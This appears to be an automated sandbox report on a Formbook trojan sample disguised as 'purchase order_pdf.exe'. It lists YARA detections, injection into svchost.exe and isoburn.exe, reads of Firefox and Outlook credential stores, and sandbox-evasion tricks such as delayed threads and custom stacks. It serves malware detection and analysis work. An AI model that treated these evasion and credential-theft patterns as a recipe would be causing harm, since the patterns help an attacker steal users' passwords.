Source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/10

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008DA2D5 GetLastError,FormatMessageW,

0_2_008DA2D5

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008C8713 AdjustTokenPrivileges,CloseHandle,		0_2_008C8713
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008C8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_008C8CC3

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008DB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_008DB59E

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008EF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_008EF121

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008E86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_008E86D0

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_00874FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00874FE9

Source: C:\Users\user\Desktop\purchase order_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\aut50A3.tmp

Jump to behavior

Source: purchase order_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: isoburn.exe, 00000006.00000003.2242116297.0000000003302000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4111352732.0000000003302000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2241958548.00000000032E0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: purchase order_pdf.exe	Virustotal: Detection: 27%
Source: purchase order_pdf.exe	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\purchase order_pdf.exe "C:\Users\user\Desktop\purchase order_pdf.exe"
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase order_pdf.exe"
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
Source: C:\Windows\SysWOW64\isoburn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase order_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\isoburn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\isoburn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: purchase order_pdf.exe

Static file information: File size 1172992 > 1048576

Source: purchase order_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: purchase order_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: purchase order_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: purchase order_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: purchase order_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: purchase order_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: purchase order_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: isoburn.pdb source: svchost.exe, 00000001.00000003.2034368078.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2034457956.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111492414.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: isoburn.pdbGCTL source: svchost.exe, 00000001.00000003.2034368078.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2034457956.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111492414.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PIrlNRZFMoz.exe, 00000005.00000002.4111690233.0000000000ECE000.00000002.00000001.01000000.00000005.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4111085780.0000000000ECE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: purchase order_pdf.exe, 00000000.00000003.1646546825.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, purchase order_pdf.exe, 00000000.00000003.1646007656.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2065388310.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2065388310.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1974218775.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1972312797.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2067376989.0000000004DBA000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2065445082.0000000004C0E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.00000000050FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: purchase order_pdf.exe, 00000000.00000003.1646546825.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, purchase order_pdf.exe, 00000000.00000003.1646007656.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2065388310.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2065388310.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1974218775.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1972312797.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000003.2067376989.0000000004DBA000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2065445082.0000000004C0E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112414330.00000000050FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: isoburn.exe, 00000006.00000002.4111352732.0000000003287000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112853127.000000000558C000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000000.2132339708.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2350658755.000000002FF6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: isoburn.exe, 00000006.00000002.4111352732.0000000003287000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112853127.000000000558C000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000000.2132339708.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2350658755.000000002FF6C000.00000004.80000000.00040000.00000000.sdmp

Source: purchase order_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: purchase order_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: purchase order_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: purchase order_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: purchase order_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008EC304 LoadLibraryA,GetProcAddress,

0_2_008EC304

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D8719 push FFFFFF8Bh; iretd	0_2_008D871B
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089E94F push edi; ret	0_2_0089E951
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089EA68 push esi; ret	0_2_0089EA6A
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00898B85 push ecx; ret	0_2_00898B98
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089EC43 push esi; ret	0_2_0089EC45
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089ED2C push edi; ret	0_2_0089ED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041905C push 72B82297h; ret	1_2_004190E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00408028 pushfd ; retf	1_2_00408034
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00419151 push ecx; iretd	1_2_00419152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004089B6 push ecx; retf	1_2_004089C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004162D3 push esi; retf	1_2_004162DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403AB0 push eax; ret	1_2_00403AB2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00407C44 pushfd ; retf	1_2_00407C45
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041856F push edx; ret	1_2_00418572
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040ADF5 push eax; retf	1_2_0040AE11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00405776 pushad ; retf	1_2_00405785
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411F7B push ebx; retf	1_2_00411F7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370225F pushad ; ret	1_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037027FA pushad ; ret	1_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx	1_2_037309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370283D push eax; iretd	1_2_03702858
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F627FA pushad ; ret	6_2_04F627F9
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F6225F pushad ; ret	6_2_04F627F9
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F6283D push eax; iretd	6_2_04F62858
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F909AD push ecx; mov dword ptr [esp], ecx	6_2_04F909B6
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F61368 push eax; iretd	6_2_04F61369
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D60385 push B09A71D6h; retf	6_2_02D6038B
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D44191 pushfd ; retf	6_2_02D44192
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D4E4C8 push ebx; retf	6_2_02D4E4CB
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D44575 pushfd ; retf	6_2_02D44581
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D54ABC push edx; ret	6_2_02D54ABF

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00874A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00874A35
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008F55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_008F55FD

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008933C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_008933C7

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\purchase order_pdf.exe	API/Special instruction interceptor: Address: 3643284
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\isoburn.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0377096E rdtsc

1_2_0377096E

Source: C:\Windows\SysWOW64\isoburn.exe	Window / User API: threadDelayed 1034			Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Window / User API: threadDelayed 8938			Jump to behavior

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-100025

Source: C:\Users\user\Desktop\purchase order_pdf.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\isoburn.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\isoburn.exe TID: 7764	Thread sleep count: 1034 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe TID: 7764	Thread sleep time: -2068000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe TID: 7764	Thread sleep count: 8938 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe TID: 7764	Thread sleep time: -17876000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe TID: 7820	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe TID: 7820	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe TID: 7820	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe TID: 7820	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe TID: 7820	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\isoburn.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\isoburn.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_008D4696
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_008DC9C7
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DC93C FindFirstFileW,FindClose,	0_2_008DC93C
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008DF200
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008DF35D
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_008DF65E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008D3A2B
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008D3D4E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008DBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_008DBF27
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D5BF20 FindFirstFileW,FindNextFileW,FindClose,	6_2_02D5BF20

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_00874AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00874AFE

Source: PIrlNRZFMoz.exe, 00000008.00000002.4111925480.0000000001440000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
